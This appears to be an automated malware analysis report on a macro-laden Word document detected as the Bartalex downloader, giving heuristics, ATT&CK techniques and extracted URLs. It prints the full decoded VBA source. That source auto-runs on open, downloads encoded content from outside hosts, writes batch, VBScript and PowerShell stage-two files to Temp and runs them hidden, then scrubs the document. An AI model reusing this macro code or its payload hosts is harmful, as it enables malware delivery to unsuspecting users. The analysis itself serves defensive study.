MALICIOUS
354
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1071.001 Web Protocols
The sample contains VBA macros that utilize CreateObject and Shell calls, indicative of malicious intent. The script attempts to download content from multiple URLs, including http://bozorg-roshan.com/1623782.txt, and assemble potential executable or script filenames. This behavior strongly suggests the document acts as a downloader for a second-stage payload.
Heuristics 13
-
ClamAV: Doc.Downloader.Bartalex-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Bartalex-1
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell(b, 0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject("MSXML2.ServerXMLHTTP") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Quick = GetObject(a) -
Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Environ(a) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://bozorg-roshan.com/lns.txt In document text (OLE body)
- http://aydinbanyoekipmanlari.com/lns.txtIn document text (OLE body)
- http://bozorg-roshan.com/1623782.txtReferenced by macro
- http://aydinbanyoekipmanlari.com/1623782.txtIn document text (OLE body)
- http://bozorg-roshan.com/1623782.txt123123123Referenced by macro
- http://savepic.su/5633401.pngReferenced by macro
- http://savepic.su/5623161.pngReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7604 bytes |
SHA-256: 294001fb565b3c181fe3fac872a2f533779d41748a90dd1c8d9119619d356534 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
ahuswhuiqwhdebghv
End Sub
Sub ahuswhuiqwhdebghv()
Dim huwe, auwd As Integer
Dim retVal As Variant
HUWQD = Module3.Juwqdhwt(20000)
FL2 = "" & HUWQD
HPPSDJ = "Temp"
PH2 = Module3.Bad("" & HPPSDJ) + "\"
NDUWGD = "461237618273612"
HYWDAX = "baaslkdjklwqdjkqwhdjqhwjkdqt"
JWIDJIAAA = Chr(97 + Sgn(5)) + "a"
HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
WKDOQ = NDUWGD
PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
+ _
"1"
VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "o" & "bject"
AFTG = "m" & "odule"
SXE = "" & Chr(Asc(".")) & Chr(101) & "xe" & ""
GNG = ".png"
PHT = "" & "htt" & "p://" & ""
SPIC = PHT + "sav" & "epic.su/"
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = PH2 + BAFL
DRT = FreeFile
BFT = FreeFile
CFT = FreeFile
DFT = FreeFile
EFT = FreeFile
PBIN = "http://bozorg-roshan.com/1623782.txt"
Dim obg, obg4 As Object
Dim asdwq As String
Set obg = _
CreateObject("MSXML2.ServerXMLHTTP")
obg.Open "GET", PBIN
obg.Send ""
CONT = obg.ResponseText
asdwq = CONT
HQUWDAAA = "0"
If (asdwq = "") Then
PBIN = "http://aydinbanyoekipmanlari.com/1623782.txt"
Set obg4 = _
CreateObject("MSXML2.ServerXMLHTTP")
obg4.Open "GET", PBIN
obg4.Send ""
CONT = obg.ResponseText
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Module3.Decode(asdwq)
TVT10 = Module3.Tort(CONT, "text10")
TVT20 = Module3.Tort(CONT, "text20")
TVT21 = Module3.Tort(CONT, "text21")
TVT30 = Module3.Tort(CONT, "text30")
TVT31 = Module3.Tort(CONT, "text31")
XPT1 = Module3.Tort(CONT, "stext1")
XPT2 = Module3.Tort(CONT, "stext2")
XPT3 = Module3.Tort(CONT, "stext3")
WVR = Module3.Bad("USE" & "RPROFILE")
post1 = InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (post1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module3.WaitFor (1)
Dim obg2 As Object
Set obg2 = _
CreateObject("MSXML2.ServerXMLHTTP")
MIWDWQ = "http://bozorg-roshan.com/lns.txt"
If (HQUWDAAA = "1") Then
MIWDWQ = "http://aydinbanyoekipmanlari.com/lns.txt"
End If
obg2.Open "GET", MIWDWQ
obg2.Send ""
SEXX = obg2.ResponseText
PSTB = PBIN + "123123123"
STAR1 = SPIC + "5633401" + GNG
STAR2 = SPIC + "5623161" + GNG
FFQ = "8"
FF = FFQ + SXE
If (hudhw = 130) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
Module3.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
Module3.WaitFor (1)
NTH1 = Module3.Freat(retVal, BAPTH)
End If
If (hudhw = 200) Then
Open PSPTH For Output As #CFT
Print #CFT, "$aisjd = '123';"
Print #CFT, "$asaisjd = '34123';"
Print #CFT, "$stat = '" + STAR2 + "';"
Print #CFT, "$ggtt = '" + SEXX + "';"
Print #CFT, "$pths = '" + PH2 + "';"
Print #CFT, "$wehs = '" + FL2 + "';"
Print #CFT, "$nnm = '" + FFQ + "';"
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, "@echo off"
Print #EFT, TVT20
Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
Print #EFT, TVT21
Close #EFT
Module3.WaitFor (1)
NTH2 = Module3.Freat(retVal, BAPTH)
End If
JUW = Chr(47)
AKK = Chr(60)
ZKK = ">"
NTH3 = Module5.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
NTH4 = Module5.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
NTH5 = Module5.Nybdqwd(AKK + INTG + ZKK, "", 3)
NTH6 = Module5.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
NTH7 = Module5.Nybdqwd(AKK + AFTG + ZKK, "", 3)
NTH8 = Module5.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Module3"
Public Function Juwqdhwt(a As Integer)
Juwqdhwt = CStr(Int((a * Rnd) + 10000))
End Function
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Freat(a As Variant, b)
a = _
Shell(b, 0)
Freat = a
End Function
Public Function Tort(a, b As String)
Dim krd, lent As Integer
krd = InStr(1, a, "<" + b + ">") + 8
lent = InStr(1, a, "<" + "/" + b + ">") - krd
KLMN = Mid(a, krd, lent)
AUHWUD = KLMN
Tort = AUHWUD
End Function
Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function
Public Function Quick(a As String)
Quick = GetObject(a)
End Function
Public Function Bad(a As String)
Bad = _
Environ(a)
End Function
Public Function Decode(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.Text = strData
WUDHA = objNode.nodeTypedValue
Decode = WUDHA
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "Module5"
Public Function Nybdqwd(a As String, b As String, c As Integer)
Dim selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
With hhhg.Find
.Text = a
.MatchWholeWord = True
hhhg.Find.Execute
hhhg.Collapse direction:=wdCollapseEnd
NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
Set selRange = ActiveDocument.Range
QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
selRange.Start = hhhg.End
.Text = b
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
If (c = 1) Then
selectedText = selRange.Delete
End If
If (c = 2) Then
selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
With hhhg.Find
.Text = a
.Replacement.Text = Chr(30 + 2)
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.